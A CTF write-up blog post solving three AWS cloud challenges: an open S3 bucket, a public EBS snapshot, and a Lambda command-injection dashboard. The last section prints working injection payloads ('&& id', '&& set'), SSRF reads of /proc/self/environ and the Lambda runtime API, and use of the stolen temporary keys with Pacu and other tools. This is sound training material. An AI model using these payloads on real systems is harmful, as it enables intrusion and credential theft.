2020 HTH CTF - Cloud Challenges

Last weekend, @strupo_ joined team NiSec to participate in the HTH 2020 CTF and together they got on the podium in third place!

2020 HTH CTF - Final Scoreboard

The challenge categories included: 
  • Cloud
  • Crypto
  • Forensics
  • Kali 101 
  • Misc
  • Pwnables
  • Recon
  • Reverse Engineering
  • Steganography
  • Web
Recently, strupo_ was fortunate enough to remotely attend Breaching the Cloud Perimeter w/Beau Bullock. As cloud testing is still very new to him, and this blog tends to focus on introductory concepts and challenges, we thought it would be appropriate to try and tackle all of the cloud challenges in this post.

Okay, let's get into it.

The Cloud category had three challenges:

  • BucketList (100)
  • OhSnap! (150)
  • Serving Less (250)


BucketList (100)

Hey guys! I set up an AWS bucket for this year's hth that we can use to store our flags for the ctf. I think I made the bucket private but I'm not very good at this cloud stuff. Send me a message if I need to edit the permissions.
Hint: Let's keep a flag in hth2020-private where it should be safe!

The challenge implied that we needed to find an AWS bucket, and the hint indicated that the flag would be in a bucket called "hth2020-private." 

In the past, we've used Slurp to enumerate buckets, but recently we've switched over to cloud_enum.

Here is how to install cloud_enum:

git clone https://github.com/initstring/cloud_enum.git && cd cloud_enum
pip3 install -r ./requirements.txt

The command used to solve this challenge can be seen here: 

./cloud_enum.py -k hth2020-private --disable-azure --disable-gcp


Keywords: hth2020-private
Mutations: /home/kali/cloud_enum/enum_tools/fuzz.txt
Brute-list: /home/kali/cloud_enum/enum_tools/fuzz.txt
[+] Mutations list imported: 242 items
[+] Mutated results: 1453 items

amazon checks

[+] Checking for S3 buckets
OPEN S3 BUCKET: http://hth2020-private.s3.amazonaws.com/



We can see that cloud_enum found an open S3 bucket, so it was simply a matter of retrieving flag.txt from it: 

curl http://hth2020-private.s3.amazonaws.com/flag.txt
"I'm pretty sure I backed up the hth instance properly. Can you double check and see if the snapshots worked?"

Struggle Bus: early on we had some issues with this challenge due to Amazon blocking our source IP. The tool would run but no results were returned. Luckily, all we had to do was switch to a different VPN server until we saw results.
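As an aside, the check that tools like cloud_enum perform is largely just unauthenticated HTTP: the status code returned by http://<name>.s3.amazonaws.com/ separates open, private, and nonexistent buckets. Here's a minimal sketch of that probe (check_bucket and classify are our illustrative names, not cloud_enum's actual code):

```python
import urllib.error
import urllib.request

def classify(status: int) -> str:
    # 200 = listable (open) bucket, 403 = exists but private, 404 = no such bucket.
    return {200: "OPEN", 403: "PROTECTED", 404: "NONEXISTENT"}.get(status, "UNKNOWN")

def check_bucket(name: str) -> str:
    # Unauthenticated GET against the bucket's virtual-hosted URL.
    url = f"http://{name}.s3.amazonaws.com/"
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return classify(resp.status)
    except urllib.error.HTTPError as err:
        return classify(err.code)
```

Real tools layer keyword mutations (the 1,453 candidates above) and multi-cloud checks on top of this basic probe.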


OhSnap! (150)

I'm pretty sure that I backed up our hth instance properly. Can you take a look at the AWS EBS snapshots and check?

hint: You will need an AWS account for this challenge. You can make one for free here: https://aws.amazon.com/resources/create-account/

For this one, we logged into our AWS account and fumbled around the management console looking for public snapshots. One issue we ran into was that we didn't think about which region we were connected to. us-east-1 is in Virginia, and there we found a snapshot whose timestamp lined up with the last-modified date gleaned from the S3 bucket:

curl http://hth2020-private.s3.amazonaws.com/?versions

<?xml version="1.0" encoding="UTF-8"?>

<ListVersionsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>hth2020-private</Name><Prefix></Prefix><KeyMarker></KeyMarker><VersionIdMarker></VersionIdMarker><MaxKeys>1000</MaxKeys><IsTruncated>false</IsTruncated><Version><Key>flag.txt</Key><VersionId>null</VersionId><IsLatest>true</IsLatest><LastModified>2020-10-30T03:15:56.000Z</LastModified><ETag>&quot;a3ebad67ece35f433c096e86651eba0b&quot;</ETag><Size>146</Size><StorageClass>STANDARD</StorageClass></Version></ListVersionsResult>
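That listing is easy to parse programmatically; here's a sketch using ElementTree on a trimmed copy of the response above:

```python
import xml.etree.ElementTree as ET

# Trimmed copy of the ListVersionsResult response shown above.
xml_doc = (
    '<ListVersionsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
    '<Name>hth2020-private</Name>'
    '<Version><Key>flag.txt</Key>'
    '<LastModified>2020-10-30T03:15:56.000Z</LastModified></Version>'
    '</ListVersionsResult>'
)

# S3 responses are namespaced, so find/findall need the namespace mapping.
ns = {"s3": "http://s3.amazonaws.com/doc/2006-03-01/"}
root = ET.fromstring(xml_doc)
versions = {
    v.find("s3:Key", ns).text: v.find("s3:LastModified", ns).text
    for v in root.findall("s3:Version", ns)
}
print(versions)  # {'flag.txt': '2020-10-30T03:15:56.000Z'}
```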

After restoring the snapshot and attempting to connect to it, we hit a wall. Taking a minute to think about it, we remembered that HTHackers is a central Ohio event, so we switched to us-east-2 and searched the public snapshots for "hth," where we found the flag. 

Because the command line is preferable to a GUI, we then solved this challenge again using the AWS CLI. Here's how to do it:

First, set up your AWS keys by using aws configure.

aws configure

AWS Access Key ID [****************FOO]: 
AWS Secret Access Key [****************BAR]: 
Default region name [us-east-1]: us-east-2
Default output format [None]:

Then, we ran the aws tool, setting the service to ec2 with the describe-snapshots command. We also used the --filters option to search descriptions for terms as seen below:

aws ec2 describe-snapshots --filters Name=description,Values=HTH*

{
    "Snapshots": [
        {
            "Description": "HTH{allyoursnapshotarebelongtous}",
            "Encrypted": false,
            "OwnerId": "351074089145",
            "Progress": "100%",
            "SnapshotId": "snap-0a54e4713301df94b",
            "StartTime": "2020-10-30T01:55:03.049Z",
            "State": "completed",
            "VolumeId": "vol-0f8e9b600853f9f23",
            "VolumeSize": 1
        }
    ]
}
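For what it's worth, the wildcard matching that --filters performs can be reproduced client-side with fnmatch; here's a sketch over snapshot records in the same shape as the output above (the "weekly backup" entry is made up for contrast):

```python
from fnmatch import fnmatch

# Snapshot records as returned by describe-snapshots, trimmed to one field;
# the "weekly backup" entry is invented to show a non-match.
snapshots = [
    {"Description": "HTH{allyoursnapshotarebelongtous}"},
    {"Description": "weekly backup"},
]

# Client-side equivalent of --filters Name=description,Values=HTH*
matches = [s["Description"] for s in snapshots if fnmatch(s["Description"], "HTH*")]
print(matches)  # ['HTH{allyoursnapshotarebelongtous}']
```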

Struggle bus: Copying that random public snapshot, starting it up, and attempting to connect to it incurred a charge of roughly $90 USD. Thankfully, we used a privacy card with a $1 limit to set up the account. We are currently working with Amazon to resolve this issue, which apparently requires a fax!

Greetings from Amazon Web Services.

We are unable to validate important details about your Amazon Web Services (AWS) account. Your AWS account has been placed on hold pending additional verification. At this time, we need you to verify the details of your account.

Please fax us a copy of the documentation listed below:
-- Current bill showing your address (utility bill, phone bill, or similar)
-- Student ID card, if applicable

We request that you also provide us with the following information:
-- Business name
-- Business phone number
-- Billing telephone number on file with the bank
-- Bank phone number (found on the back of your card)

Serving Less (250)

Full disclosure: while we did have RCE on this system before the competition ended, we were ultimately unable to solve this challenge on our own. After the event ended, we asked for lots of help after finding the first two flags. Special thanks to @atomnet, the only player to solve the challenge during the event, and @syn_ack_zack, who created the challenge and held our hand for the very last part of it.

A simple dashboard monitoring page built in the Cloud, what could go wrong?

hint: It looks like the dashboard contains output from different shell commands, I wonder if you can run your own commands?

The challenge link presented the following web page. From the hint and the contents of the page itself, we inferred that we would need to find some place to inject commands:

System Monitor

Initial fuzzing for parameters was quickly halted due to the target throttling requests. We knew this would have to be a manual process so the first place we looked was the HTML source where we observed the following comment:

var secured = new XMLHttpRequest();

secured.onreadystatechange = function() {
   if (this.readyState == 4 && this.status == 200) {
      document.getElementById("secured").innerHTML = this.responseText;
   }
};

secured.open("POST", "https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller", true);

From this, we inferred that if we sent a POST request with the "target" parameter set to a URL, we would have our injection point, as it was the only parameter to be found on the target system.

We tested this using curl:

curl -X POST -d '{"target":"https://controller-cache.s3.amazonaws.com/"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>24E9CE049D4A0A12</RequestId><HostId>/6iRi8Qs2hGZlqmHcDxojC5b2ICikOGQQf2JXGdQgaGtB4ZmyLDoyuwlnni+zop5fY/P3vlM7SA=</HostId></Error>

curl -X POST -d '{"target":"welcomethrill.house"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller
"<HTML><HEAD><meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">\n<TITLE>301 Moved</TITLE></HEAD><BODY>\n<H1>301 Moved</H1>\nThe document has moved\n<A HREF=\"http://blog.welcomethrill.house/\">here</A>.\n</BODY>

curl -X POST -d '{"target":"welcomethrill.house &&id"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller
"<HTML><HEAD><meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">\n<TITLE>301 Moved</TITLE></HEAD><BODY>\n<H1>301 Moved</H1>\nThe document has moved\n<A HREF=\"http://blog.welcomethrill.house/\">here</A>.\n</BODY></HTML>\nuid=994(sbx_user1051) gid=991 groups=991\n"
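Based on that behavior (and on the Lambda source we pulled next), the vulnerability presumably boils down to the classic pattern of untrusted input being interpolated into a shell string. A sketch of that pattern, with build_cmd and fetch as our illustrative names rather than the challenge's actual code:

```python
from subprocess import PIPE, run

def build_cmd(target: str) -> str:
    # The injection point: the user-supplied target lands inside a shell string.
    return f"curl -s {target}"

def fetch(target: str) -> str:
    # shell=True means "host && id" runs curl, then id, as two separate commands.
    return run(build_cmd(target), shell=True, stdout=PIPE, stderr=PIPE).stdout.decode()

# With an injected "&& id", the shell sees two commands:
print(build_cmd("welcomethrill.house && id"))  # curl -s welcomethrill.house && id
```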


We then began initial reconnaissance by running commands such as pwd and ls. The output from ls showed that there was a file "lambda_function.py" present. We used cat to read the contents for anything of interest:

curl -X POST -d'{"target":"welcomethrill.house &&cat lambda_function.py"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller | sed 's/\\n/\n/g' &&echo
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4881 100 4823 100 58 6597 79 --:--:-- --:--:-- --:--:-- 6668
"<HTML><HEAD><meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">
<H1>301 Moved</H1>
The document has moved
<A HREF=\"http://blog.welcomethrill.house/\">here</A>.
import json
import requests
from subprocess import PIPE, run
import base64



The string under FRAGMENT - 01 looked like a hex string, so we converted it to ASCII using xxd:

echo 4854487b6e300a0a | xxd -r -p

Next, we captured the second part of the flag by observing the output of the set command:

curl -X POST -d'{"target":"welcomethrill.house && set"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller | sed 's/\\n/\n/g'&&echo
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2877 100 2838 100 39 1558 21 0:00:01 0:00:01 --:--:-- 1579
"<HTML><HEAD><meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">
<H1>301 Moved</H1>
The document has moved
<A HREF=\"http://blog.welcomethrill.house/\">here</A>.
BASH_EXECUTION_STRING='curl welcomethrill.house && set'
BASH_VERSINFO=([0]=\"4\" [1]=\"2\" [2]=\"46\" [3]=\"2\" [4]=\"release\" [5]=\"x86_64-redhat-linux-gnu\")
IFS=' \t
PS4='+ '

Here's the value converted:

echo 5f35655276330a0a | xxd -r -p
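The same conversions can be reproduced with Python's bytes.fromhex; the trailing 0a bytes in each fragment are just newlines, which strip() removes:

```python
# Decode both hex fragments recovered so far (trailing 0a bytes are newlines).
frag1 = bytes.fromhex("4854487b6e300a0a").decode().strip()
frag2 = bytes.fromhex("5f35655276330a0a").decode().strip()
print(frag1 + frag2)  # HTH{n0_5eRv3
```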

We also took note of the AWS keys that were defined. The access key ID begins with ASIA, which means these are temporary credentials; we would have to pull fresh key values about every 10 minutes so we always had a valid set. If the ID began with AKIA, we would know they were long-term credentials and wouldn't have to worry so much about how long the review was taking. 
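That prefix convention is easy to encode as a quick triage helper (our own illustrative function, not part of any tool used here):

```python
def key_lifetime(access_key_id: str) -> str:
    # AWS access key ID prefixes: ASIA = temporary STS creds, AKIA = long-term IAM creds.
    if access_key_id.startswith("ASIA"):
        return "temporary (STS)"
    if access_key_id.startswith("AKIA"):
        return "long-term (IAM)"
    return "unknown"

print(key_lifetime("ASIA5FQD66V2EJB2PXZO"))  # temporary (STS)
```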

If you have made it this far and you would just like the solution, please skip to the end. The bulk of this write-up is meant not only to regale you all with our time on the struggle bus, but also to introduce you to a few AWS testing tools if you haven't heard of them already.  Namely, these:
  • Pacu
  • WeirdAAL
  • Enumerate-IAM
We started the review by using Pacu.


What is pacu? Here's a snippet we stole from the readme:

Pacu is an open-source AWS exploitation framework, designed for offensive security testing against cloud environments. Created and maintained by Rhino Security Labs, Pacu allows penetration testers to exploit configuration flaws within an AWS account, using modules to easily expand its functionality. Current modules enable a range of attacks, including user privilege escalation, backdooring of IAM users, attacking vulnerable Lambda functions, and much more.

Installation and use were straightforward:

git clone https://github.com/RhinoSecurityLabs/pacu && cd pacu 
bash install.sh 
python3 pacu.py

Found existing sessions:
  [0] New session
  [1] wtg

Choose an option: 0
What would you like to name this new session? hth
Pacu (hth:No Keys Set) > set_keys
Key alias [None]: hth
Access key ID [None]: ASIA5FQD66V2EJB2PXZO
Secret access key [None]: 9rBaTz2mJsoAfSEhxv3yShviQ4z6H5dbZ7caOT2P
Session token (Optional - for temp AWS keys only) [None]: IQoJb3JpZ2luX2VjEJT//////////wEaCXVuCtAXoAiB5<snip>rkLmWYx5a5/oaaQ==
Keys saved to database.
Pacu (hth:hth) > 

Unfortunately for us, Pacu was not the right tool for the job. Rather than cover how we ran literally all of the modules and failed, here are some basic tips and tricks instead:

  • To list modules, type: ls
  • To run a module, type: run <module__name>   # for example: Pacu (hth:hth) > run ec2__enum
  • To verify which keys you are using, type: whoami

Pacu also supports running AWS CLI commands directly at its prompt.


Next, we used WeirdAAL to see if we missed any permissions. From the readme:

WeirdAAL has two goals:
  1. Answer what can I do with this AWS Keypair [blackbox]?
  2. Be a repository of useful functions (offensive & defensive) to interact with AWS services.
Installation and setup were very straightforward:

git clone https://github.com/carnal0wnage/weirdAAL.git 
cd weirdAAL 
sudo apt-get install python3-venv
python3 -m venv weirdAAL 
source weirdAAL/bin/activate 
pip3 install -r requirements.txt
python3 create_dbs.py

There were a few missing dependencies on our Kali 2020.2 image that we installed using pip, but nothing overwhelming.

We then edited the .env file and added our keys to the file. Remembering the keys are only valid for a short time, we checked that they were still valid when the tool finished running. Our .env file looked something like this:

cat .env
aws_access_key_id = ASIA5FQD66V2GBTFRPGO
aws_secret_access_key = iXh93G067aEoR7mqGSYLAkBb0hImSzIMXR9/IoyO
aws_session_token = IQoJb3JpZ2luX2VjELf//////////wEaC<snip>bBA==

Here was the command we used for the first run:

python3 ./weirdAAL.py -m recon_all -t hth2020


We parsed out the following permissions:

[+] elasticbeanstalk Actions allowed are [+]
['DescribeApplications', 'DescribeApplicationVersions', 'DescribeEnvironments', 'DescribeEvents']

[+] opsworks Actions allowed are [+]

[+] route53 Actions allowed are [+]

[+] sts Actions allowed are [+]

At this point, we pored over the AWS CLI documentation for the identified services (sts, route53, opsworks, elasticbeanstalk) and investigated basically every command, query, and option that went along with them. 

We learned a lot, but obviously not enough, and as of this point we were still unable to solve the challenge.


Then, we tried a third tool called enumerate-iam per the recommendation of keramas to see if we could find anything else. 

Installation and usage:

git clone https://github.com/andresriancho/enumerate-iam.git 
cd enumerate-iam/ 
pip install -r requirements.txt
./enumerate-iam.py --access-key ASIA5FQD66V2LOPLOLYH --secret-key GNVI5HRw7bBx2/H9++TJOvrc6WnzRJi2vdKQ5shj --session-token IQoJb3JpZ2luX2VjEKv//////////wEaC<snip>xfg== --region us-east-1
2020-11-16 18:51:29,900 - 84840 - [INFO] Starting permission enumeration for access-key-id "ASIA5FQD66V2LOPLOLYH"
2020-11-16 18:51:30,502 - 84840 - [INFO] -- Account ARN : arn:aws:sts::905172678004:assumed-role/hth_2020_surfin-role-9mahzo9e/controller_logic
2020-11-16 18:51:30,502 - 84840 - [INFO] -- Account Id : 905172678004
2020-11-16 18:51:30,502 - 84840 - [INFO] -- Account Path: assumed-role/hth_2020_surfin-role-9mahzo9e/controller_logic
2020-11-16 18:51:31,318 - 84840 - [INFO] Attempting common-service describe / list brute force.
2020-11-16 18:51:33,532 - 84840 - [INFO] -- sts.get_caller_identity() worked!
2020-11-16 18:51:33,724 - 84840 - [INFO] -- dynamodb.describe_endpoints() worked!

Enumerate-iam found the describe-endpoints command for the dynamodb service, but the tool hung, and manual verification with the AWS CLI resulted in nothing but "AccessDeniedException" error messages or uninteresting information.

Finally, we were left with not much more than the AWS CLI and our wits. 


We spent hours and hours reading documentation for this tool and trying commands: interacting with X-Ray and the Lambda runtime, using regex, and trying to describe or list out...something.  

What we encountered were a lot of error messages, like this one for example:

aws s3 ls s3://controller-cache.s3.us-east-1.amazonaws.com/
An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist

Before we get to the solution, we wanted to showcase a way to potentially expose sensitive information when you have SSRF or RCE in a target as described in this write-up on github by RhinoSecurityLabs.

We knew we could run additional commands by leveraging the && construct, but after reading the lambda_function.py script, we understood that it was taking the target parameter value and passing it to curl. So, we were able to recreate the attack exactly as described in the write-up by sending the following request:

curl -X POST -d'{"target":"http://localhost:9001/2018-06-01/runtime/invocation/next"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1156 100 1087 100 69 2127 135 --:--:-- --:--:-- --:--:-- 2262
"{\"version\":\"2.0\",\"routeKey\":\"ANY /controller\",\"rawPath\":\"/controller\",\"rawQueryString\":\"\",\"headers\":{\"accept\":\"*/*\",\"content-length\":\"69\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"qbf6sc8oa5.execute-api.us-east-1.amazonaws.com\",\"user-agent\":\"curl/7.72.0\",\"x-amzn-trace-id\":\"Root=1-5fb5ff71-0b32fd6e66c2c9213ed75fae\",\"x-forwarded-for\":\"\",\"x-forwarded-port\":\"443\",\"x-forwarded-proto\":\"https\"},\"requestContext\":{\"accountId\":\"905172678004\",\"apiId\":\"qbf6sc8oa5\",\"domainName\":\"qbf6sc8oa5.execute-api.us-east-1.amazonaws.com\",\"domainPrefix\":\"qbf6sc8oa5\",\"http\":{\"method\":\"POST\",\"path\":\"/controller\",\"protocol\":\"HTTP/1.1\",\"sourceIp\":\"\",\"userAgent\":\"curl/7.72.0\"},\"requestId\":\"WPTZuj6NIAMEMBw=\",\"routeKey\":\"ANY /controller\",\"stage\":\"$default\",\"time\":\"19/Nov/2020:05:15:29 +0000\",\"timeEpoch\":1605762929331},\"body\":\"eyJ0YXJnZXQiOiJodHRwOi8vbG9jYWxob3N0OjkwMDEvMjAxOC0wNi0wMS9ydW50aW1lL2ludm9jYXRpb24vbmV4dCJ9\",\"isBase64Encoded\":true}"
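The body field in that response is just our own request echoed back, base64-encoded (note isBase64Encoded: true), which a quick decode confirms:

```python
import base64

# The base64-encoded body from the runtime API response above.
body = (
    "eyJ0YXJnZXQiOiJodHRwOi8vbG9jYWxob3N0OjkwMDEvMjAxOC0wNi0wMS9ydW50"
    "aW1lL2ludm9jYXRpb24vbmV4dCJ9"
)
print(base64.b64decode(body).decode())
# {"target":"http://localhost:9001/2018-06-01/runtime/invocation/next"}
```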

Or, another way to grab the keys:

curl -X POST -d'{"target":"file:///proc/self/environ"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2053 100 2015 100 38 4324 81 --:--:-- --:--:-- --:--:-- 4396
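Since /proc/self/environ is a NUL-separated blob, a short parser pulls out the AWS_* variables; parse_environ and the sample bytes here are illustrative, not real challenge output:

```python
def parse_environ(raw: bytes) -> dict:
    # /proc/self/environ separates KEY=VALUE pairs with NUL bytes.
    return dict(
        pair.split("=", 1)
        for pair in raw.decode().split("\x00")
        if "=" in pair
    )

# Made-up sample in the same shape as the Lambda environment.
sample = b"AWS_ACCESS_KEY_ID=ASIA...\x00AWS_SECRET_ACCESS_KEY=...\x00PATH=/usr/bin\x00"
creds = {k: v for k, v in parse_environ(sample).items() if k.startswith("AWS_")}
print(sorted(creds))  # ['AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY']
```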

The Solution

We did notice the S3 bucket in the commented-out portion of the script where we found the command injection vulnerability. We also tried multiple times to munge the URL and "correct" it by guessing, adding things like regions to it. In the end, we didn't understand where to go from there. 

Finally, we reached out to @syn_ack_zack one last time, ready to throw in the towel, when he explained we simply needed to remove the domain from the bucket name. 

Sad Times.

We pulled a fresh set of keys and issued the following commands:

aws s3 ls s3://controller-cache
2020-10-17 20:42:28 79 secure.bin

aws s3 cp s3://controller-cache/secure.bin .
download: s3://controller-cache/secure.bin to ./secure.bin

cat ./secure.bin


cat ./secure.bin | grep 7 | xxd -r -p

Putting it all together, we finally see the Serving Less flag:



CTFs, in our opinion, are the best teachers for hackers. They motivate you to read technical documentation for hours on end, they encourage you to take chances, make mistakes, and to keep at it. In our experience, the knowledge and lessons learned during CTFs will stick with you the longest.  
We highly recommend choosing events and challenges focused on technology and concepts you know little or nothing about. It's both humbling and rewarding. 

Hackers Teaching Hackers put on a great CTF and we certainly learned a lot. Thanks to everyone at HTHackers and everyone on team NiSec! 
Thanks for reading!

Find us on twitter: @teamWTG
